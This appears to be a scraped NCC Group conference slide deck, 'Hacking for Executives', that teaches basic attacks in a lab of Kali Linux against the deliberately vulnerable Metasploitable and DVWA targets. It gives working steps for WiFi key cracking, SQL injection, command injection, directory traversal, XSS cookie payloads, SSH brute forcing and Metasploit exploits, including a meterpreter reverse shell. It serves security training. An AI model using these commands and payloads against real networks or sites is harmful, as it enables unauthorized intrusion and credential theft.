View
62
Download
0
Embed Size (px)
Citation preview
Hacking for Executives
Basic Hacks Used by Real World Attackers
North Texas Cyber Security Conference
November 10th, 2017
Tony Cargile and Matt Nash
• Introductions
• Session 1
• Getting the Lab Set Up
• Configuring our Wifi Card
• Attacking WEP protected routers
• Brute forcing WPA protected routers
• Finish Up With A Q&A
• Session 2
• Enumeration
• Web Application Attacks
• Brute Force Attacks
• Accessing Backdoors
• Exploiting Known Vulnerabilities
Agenda
~ tony$ whoami
• Principal Security Consultant at NCC Group
• Austin Office
• Specializing in Application Security and Security Development LifeCycle
• National Conferences on DANE and SDLC
• Background in Development
• Bachelor of Science in Computer Science from University of Texas at Austin
• Born and raised in Fort Worth, but don’t hold that against me
~ matt$ whoami
• Security Consultant at NCC Group
• Austin Office
• Specializing in Application Security, Infrastructure Assessment,
and Forensics
• Certified Digital Forensic Investigator and Incident
Responder
• Background in System Administration
• Bachelor of Science in Food & Resource Economics from
University of Florida
• Born and raised in Florida - sometimes referred to as Florida Man
• (only some of the news stories are true)
What is this training
• This is not a BlackHat Training
• No technical experience needed
• The purpose of this training is to
teach basic attacks and tools to
managers and executives in
decision making roles within the
security realm.
• All the tools and labs are open
source and available online
The Lab
• Everyone will be constructing their own
“hacker lab” within their computer.
• The Lab will consist of two virtual
machines, controlled by VMware
Player:
• Kali Linux: A common attacker
Linux OS
• Metasploitable: A purposefully
vulnerable Linux OS
• This course is designed for Windows,
but 100% possible on Macs and Linux
The Wifi Lab
• SSID: NCC Lab 1
• WPA Password Protected
• BSSID: 00:1F:33:E5:2C:A1
• Password: ?
• SSID: NCC Lab 2
• WEP Protected
• BSSID: 68:7F:74:C4:D8:64
• Password: ?
Setting Up the Lab
Opening the USB
• 3 Files
• Kali Linux VM – 7zipped
• Metasploitable 2 VM – zipped
• VMware Player Windows Installer
VMWare Install
• First, start by running the VMware installer
VMWare Install
• Accept the EULA
VMware install
• No need to install the Enhanced Keyboard Driver
VMware install
• Determine whether you want to give VMware your data
VMware install
VMware install
Run VMware Player Once Installed
• Once installed, on first run it will ask for a license
Extracting the VMs
Extracting the VMs
• Extract to an easy to locate
address.
• Take note of where you extracted
• Don’t put it on the USB
Installing 7-Zip
Right-click on the 7-Zip installer and click “Run as administrator”
Installing 7-Zip
Enter administrator password and click “Yes”
Installing 7-Zip
Click “Install”
Installing 7-Zip
Installing 7-Zip
Open 7-Zip program and navigate to the folder containing the Kali archive
Installing 7-Zip
Select the Kali Archive and click “Extract”
Installing 7-Zip
Choose an extraction location and click “OK”
Extracting the VMs
Opening the VMs
Opening the VMs
Configuring the VMs
• This is an important step
for 2 reasons:
1. We need to make sure
that our VMs can talk to
each other.
2. We need to make sure
that we don’t expose our
VMs to the world.
Configuring the VMs
• Verify that the
Network Adapter says
“NAT”
Powering On Metasploitable
Powering On Metasploitable
Powering On Metasploitable
Powering On Metasploitable
Installing VMware Tools
Logging Into Metasploitable
• Default credentials:
• Username: msfadmin
• Password: msfadmin
Logged into Metasploitable
Getting the IP Address
INPUT: ifconfig
• Note the IP Address: we will need it later!
Powering on Kali
• You will go through the
same steps as when you
powered on Metasploitable.
• Click “I copied it”
• Don’t change the keyboard
timeout
• Install VMware tools.
Kali Starting Up
Enable Full Screen
Log into Kali
• Default credentials:
• Username: root
• Password: toor
Kali on Startup
Opening the terminal
• Unlike Windows, the task bar is on the top
• Kali now has the quick start bar on the left
• Click the black terminal icon
Getting Kali’s IP Address
COMMAND: ifconfig
• Note the IP Address: we will need it later!
Wireless Attacks
Connect USB WiFi Adapter to Kali
Plug in the provided USB wireless adapter and click
the “Show devices” icon in the top-right
Connect USB WiFi Adapter to Kali
Mouse over USB icon to display connected USB device
Connect USB WiFi Adapter to Kali
Right-click on USB icon and click “Connect (Disconnect from host)”
Connect USB WiFi Adapter to Kali
Verify Kali Sees the WiFi Adapter
Check the Name of the WiFi Interface
Open a Terminal window and use `ip addr` command to list network interfaces
INPUT: ip addr
Place WiFi Interface Into Monitor Mode
Use `airmon-ng` to place wlan0 interface into “monitor” mode
INPUT: airmon-ng start wlan0
Kill Problematic Processes
Use `airmon-ng` to kill processes which may cause problems with wireless interception
INPUT: airmon-ng check kill
Kill Problematic Processes
Use `airodump-ng` to search for nearby wireless access points
INPUT: airodump-ng wlan0mon
Nearby Wireless Access Points
We see two interesting access points – one with WEP encryption
(NCC Lab 2) and another with WPA encryption (NCC Lab 1)
Cracking WEP
Nearby Wireless Access Points
We see two interesting access points – one with WEP encryption
(NCC Lab 2) and another with WPA encryption (NCC Lab 1)
Capturing Wireless Traffic
Use `airodump-ng` to capture traffic to/from the identified WEP-encrypted access point
INPUT: airodump-ng –c 6 –bssid 68:7F:74:C4:D8:64 –ivs
–w Desktop/NCC-Lab-2/NCC-Lab-2_ivs wlan0mon
Capturing Wireless Traffic
Actively capturing data to/from the identified WEP-encrypted access point
Capturing Wireless Traffic
Using `aircrack-ng` against the captured wireless data
INPUT: aircrack-ng Desktop/NCC-Lab-2/NCC-Lab-2_ivs-01.ivs
Capturing Wireless Traffic
`aircrack-ng` has cracked the WEP key used to encrypt data
to/from this wireless access point
Capturing Wireless Traffic
`aircrack-ng` has cracked the WEP key used to
encrypt data to/from this wireless access point
Bruteforcing WPA
Nearby Wireless Access Points
We see two interesting access points – one with WEP encryption
(NCC Lab 2) and another with WPA encryption (NCC Lab 1)
Capturing Wireless Traffic
Use `airodump-ng` to capture traffic to/from the identified WPA-encrypted access point
INPUT: airodump-ng –c 11 –bssid 00:1F:33:E5:2C:A1
–w Desktop/NCC-Lab-1/NCC-Lab-1 wlan0mon
Capturing Wireless Traffic
Actively capturing data to/from the identified WPA-encrypted access point
Capturing Wireless Traffic
Using `aircrack-ng` against the captured wireless data
INPUT: aircrack-ng -b 00:1F:33:E5:2C:A1 –w /usr/share/wordlists/rockyou.txt
Desktop/NCC-Lab-1/NCC-Lab-1-01.cap
Capturing Wireless Traffic
`aircrack-ng` is attempting a brute force attack using the
passwords in the “rockyou” wordlist
Capturing Wireless Traffic
`aircrack-ng` has cracked the WPA key used to
encrypt data to/from this wireless access point
Web Application Attacks
Open the Web Browser
• Select the orange Firefox ESR icon
• Can also be selected by going to Applications
Browse to Metasploitable
• Input the IP Address of Metasploitable into the URL Bar
Welcome to DVWA
Turn on Easy Mode
The Reset Button
SQL Injection
• What is it?
• How prevalent is it?
• How much damage can it cause?
SQL Injection
SQL Injection
SQL Injection
• Error messages are great resources for Attackers!
SQL Injection
INPUT: ‘ or 1=1+’
SQL Injection
INPUT: ‘ UNION ALL SELECT user,password from users where 1=1+’
Command Injection
• What is it?
• How prevalent is it?
• How much damage can it cause?
• Similar to SQL Injection, but instead of injecting into SQL Database,
we are injecting into a command request by the web application server.
Command Injection
INPUT: 8.8.8.8
Command Injection
Command Injection
INPUT: 8.8.8.8; ls
Command Injection
INPUT: 8.8.8.8; whoami
Command Injection
INPUT: 8.8.8.8; cat /etc/passwd
Local File Inclusion/Directory Traversal
• What is it?
• How prevalent is it?
• How much damage can it cause?
Local File Inclusion/Directory Traversal
Local File Inclusion/Directory Traversal
INPUT: test.php
Local File Inclusion/Directory Traversal
INPUT: ../../phpinfo.php
Local File Inclusion/Directory Traversal
INPUT: ../../../../../../../../etc/passwd
Cross Site Scripting
• What is it?
• How prevalent is it?
• How much damage can it cause?
Stored Cross Site Scripting
Stored Cross Site Scripting
Stored Cross Site Scripting
INPUT: <img src=“http://bit.ly/2dtWOWN”>
Stored Cross Site Scripting
Stored Cross Site Scripting
INPUT: <script>alert(document.cookie);</script>
Stored Cross Site Scripting
Stored Cross Site Scripting
DON’T DO THIS: <script>document.location=“https://nccgroup.trust”;</script>
Reflected Cross Site Scripting
Reflected Cross Site Scripting
Reflected Cross Site Scripting
Reflected Cross Site Scripting
Reflected Cross Site Scripting
Reflected Cross Site Scripting
Network Penetration Attacks
Enumeration
INPUT: nmap -sV -p- 192.168.132.128
Enumeration
Brute Forcing Passwords
INPUT: hydra -l sys –P /usr/share/john/password.lst –t 4 192.168.132.128 ssh
Brute Forcing Passwords
Brute Forcing Passwords
INPUT: ssh [email protected]
Running Metasploit
INPUT: msfconsole
Enumeration
Loading an Exploit
INPUT: use exploit/unix/ftp/vsftpd_234_backdoor
Loading an ExploitINPUT: show options
INPUT: set RHOST 192.168.132.128
Running an Exploit
INPUT: run
Running an ExploitINPUT: id
INPUT: whoami
INPUT: ls
Loading an Exploit
INPUT: use exploit/unix/misc/distcc_exec
Loading an ExploitINPUT: show options
INPUT: set RHOST 192.168.132.128
Running an Exploit
INPUT: run
INPUT: id
INPUT: ls
Exploiting Java RMI Using Meterpreter
INPUT: use exploit/multi/misc/java_rmi_server
INPUT: show options
Exploiting Java RMI Using Meterpreter
INPUT: set RHOST 192.168.132.128
INPUT: set LHOST 192.168.132.129
INPUT: set PAYLOAD java/meterpreter/reverse_tcp
INPUT: run
Q&A
Contact Us
• Mitchell Merrick
• Strategic Account Manager
• (512) 431-6213
• Tony Cargile
• Principal Security Consultant
• Matt Nash
• Security Consultant
• www.nccgroup.trust
• https://www.linkedin.com/company/ncc-group/
• https://twitter.com/NCCGroupplc
• https://www.facebook.com/NCCGroupplc/
• https://plus.google.com/+nccgroup
127
Office Locations
EuropeManchester - Head Office
Basingstoke
Belgium
Cheltenham
Denmark
Edinburgh
Germany
Glasgow
Leatherhead
Leeds
Lithuania
London
Luxembourg
Milton Keynes
Spain
Sweden
Switzerland
The Netherlands
USAAtlanta, GA
Austin, TX
Chicago, IL
New York, NY
San Francisco, CA
Seattle, WA
Sunnyvale, CA
AustraliaSydney
CanadaKitchener, ON
Middle EastDubai